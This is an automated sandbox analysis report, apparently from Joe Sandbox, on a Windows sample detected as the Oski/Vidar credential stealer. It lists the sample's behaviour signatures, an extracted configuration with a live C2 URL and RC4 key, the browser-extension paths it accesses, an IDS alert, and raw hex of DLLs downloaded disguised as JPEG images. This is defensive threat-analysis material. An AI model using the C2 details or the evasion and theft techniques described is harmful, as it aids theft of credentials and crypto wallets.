Windows Analysis Report gunzipped.exe

Overview

General Information

Sample Name:	gunzipped.exe
Analysis ID:	548641
MD5:	c2301b62539adcba29dcf6a3200bd017
SHA1:	fd80f7e8e32661d5ec12e7a901f22a9ed82e17a7
SHA256:	c30ce79d7b5b0708dc03f1532fa89afd4efd732531cb557dc31fe63acd5bc1ce
Tags:	exeOskiStealer
Infos:
Most interesting Screenshot:

Detection

Oski Stealer Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Yara detected Oski Stealer

Yara detected Vidar stealer

Tries to steal Crypto Currency Wallets

Downloads files with wrong headers with respect to MIME Content-Type

Machine Learning detection for sample

Injects a PE file into a foreign processes

Posts data to a JPG file (protocol mismatch)

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Enables debug privileges

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Uses taskkill to terminate processes

PE file contains more sections than normal

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Signatures

AV Detection:

Found malware configuration

Source: 0.2.gunzipped.exe.2cb0000.1.unpack	Malware Configuration Extractor: Oski {"C2 url": "http://2.56.57.108/osk/", "RC4 Key": "056139954853430408"}
Source: 0.2.gunzipped.exe.2cb0000.1.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://2.56.57.108/osk/", "RC4 Key": "056139954853430408"}

Multi AV Scanner detection for submitted file

Source: gunzipped.exe

ReversingLabs: Detection: 53%

Machine Learning detection for sample

Source: gunzipped.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.gunzipped.exe.2cb0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.gunzipped.exe.7b0000.8.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.14.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.12.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.4.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.10.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.6.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.2.unpack	Avira: Label: TR/AD.Chapak.dvwuj

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CCB10 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_007CCB10
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CC900 _memset,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	1_2_007CC900
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CCBA0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_007CCBA0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CCD30 _malloc,_malloc,CryptUnprotectData,	1_2_007CCD30
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CEED0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_007CEED0

Compliance:

Uses 32bit PE files

Source: gunzipped.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: wntdll.pdbUGP source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source:	Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405C06 FindFirstFileA,FindClose,	0_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405C06 FindFirstFileA,FindClose,	1_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00402630 FindFirstFileA,	1_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B43DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,	1_2_007B43DF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007D0540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,	1_2_007D0540
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CE640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	1_2_007CE640
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CD360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	1_2_007CD360
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CF6B0 FindFirstFileExW,	1_2_007CF6B0

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 4x nop then add esp, 04h

1_2_007D3050

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.3:49707 -> 2.56.57.108:80

Downloads files with wrong headers with respect to MIME Content-Type

Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:27 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT ETag: "235d0-58a9fc6206c00" Accept-Ranges: bytes Content-Length: 144848 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:28 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT ETag: "9d9d8-5561b116cc500" Accept-Ranges: bytes Content-Length: 645592 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:28 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT ETag: "519d0-58a9fc2e87280" Accept-Ranges: bytes Content-Length: 334288 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:29 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT ETag: "217d0-58a9fc4382400" Accept-Ranges: bytes Content-Length: 137168 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: http	Image file has PE prefix: HTTP/1.1 200 OK Date: Thu, 06 Jan 2022 06:57:29 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1m PHP/5.3.29 mod_wsgi/4.4.11 Python/2.7.10 Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT ETag: "6b738-58a9fc4d0ba80" Accept-Ranges: bytes Content-Length: 440120 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 